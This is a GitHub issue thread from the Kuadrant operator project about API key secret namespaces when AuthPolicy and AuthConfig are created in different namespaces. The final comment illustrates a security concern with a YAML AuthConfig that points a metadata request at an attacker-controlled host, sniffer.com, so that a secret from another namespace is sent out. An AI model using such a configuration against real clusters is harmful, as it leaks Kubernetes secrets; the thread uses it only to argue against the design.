### ISSUE TITLE
AuthPolicy ApiKey allNamespace doesn't work

### ISSUE THREAD

**Issue by pehala** [Kuadrant/kuadrant-operator#127]
`AuthPolicy` like this won't work because the actual `AuthConfig` will be created in a different namespace (kuadrant-system) than the `AuthPolicy`.
```
spec:
  authScheme:
    identity:
      - apiKey:
          allNamespaces: false
          selector:
            matchLabels:
              group: testrun-phala-kudrnt-te-eskk-yelyse
        credentials:
          in: authorization_header
          keySelector: APIKEY
        metrics: false
        name: api_key
        priority: 0
```

**Comment by guicassolato** [comment]
@pehala, 

By default, Authorino binds API key secrets only in the same namespace as the AuthConfig – i.e., `allNamespaces: false`.

You should switch to `allNamespaces: true` to make Authorino bind API key secrets in whatever namespace to this AuthPolicy/AuthConfig (provided the labels of the secret match of course).

**Comment by pehala** [comment]
I know, but from the perspective of `AuthPolicy` the `allNamespaces: false` should mean namespace of AuthPolicy, which is not true, it means kuadrant-system.

**Comment by guicassolato** [comment]
Right, if the AuthPolicy and AuthConfig are created in different namespaces, then `allNamespaces: false` means that the API key secrets have to be created in the same namespace as the AuthConfig, not as the AuthPolicy.

**Comment by pehala** [comment]
The same problem will occur with all secrets, e.g. UMA client credentials one.

**Comment by guicassolato** [comment]
This is a tricky one.

For a security reason, I would not change how this works in the AuthConfig. An AuthConfig should be able to ready Kubernetes secrets referred by name (i.e. OAuth2 client secret, UMA client secret, HTTP metadata auth credentials, OPA external policy registry auth credentials, and Wristband singing keys) only from the same namespace as the AuthConfig itself.

Secrets selected by label selector (i.e. API keys and X.509 issuer TLS certs) default to the same behaviour, unless `allNamespaces` is set to `true` for the particular identity config, which must be a choice of the user.

In every case, none of these secrets are sent to the logs when read.

On the Kuadrant side, creating the AuthConfig in the same namespace as the AuthPolicy will not scale well when we start merging AuthPolicies into single AuthConfigs. 🤔 

Either we would have to "mirror" the secrets from the namespace of the AuthPolicy into the namespace of the AuthConfig (safer although harder to manage), or we'll have to create an exception in Authorino to make it possible for it to read secrets from other namespaces for Kuadrant-managed instances (trickier as it shouldn't be an option for users directly).

**Comment by pehala** [comment]
How about the ability to specify from which namespace the secrets are read? Like:
```
      - apiKey:
            allNamespaces: false
            namespace: toystore
```
Kuadrant could then either use that namespace or if none supply the namespace of AP

**Comment by guicassolato** [comment]
> How about the ability to specify from which namespace the secrets are read?

This may be acceptable for label selected secrets (i.e. API keys and X.509 issuer TLS certs), but not the ones referred by name.

**Comment by pehala** [comment]
I do not see a reason why it cannot work even with the named ones:
```
targetRef:
  name: "secret"
  namespace: "toystore"
```
Not sure about internal k8s types but that should work right?

**Comment by guicassolato** [comment]
> I do not see a reason why it cannot work even with the named ones

It opens a security concern. The operator of Authorino would have to be extra careful with the RBAC settings so the instances don't have more access than they should.

Here's an example of how the vulnerability could be exploited:

A malicious user creates an AuthConfig containing the following:

```yaml
spec:
  metadata:
  - name: sniffer
    http:
      endpoint: http://sniffer.com # an endpoint controlled by the malicious user
      sharedSecretRef:
        name: target-secret
        namespace: target-ns # a k8s namespace that authconfig owner (the malicious user) cannot read secrets from but the authorino instance can
        key: target-key
```

Then the malicious user sends any request whose authorization will be handled by that Authorino instance; Authorino sends a metadata request to `http://sniffer.com`; the value stored in the `target-key` key of the `target-ns/target-secret` secret will show up the `Authorization` header of the request received by the sniffer app.
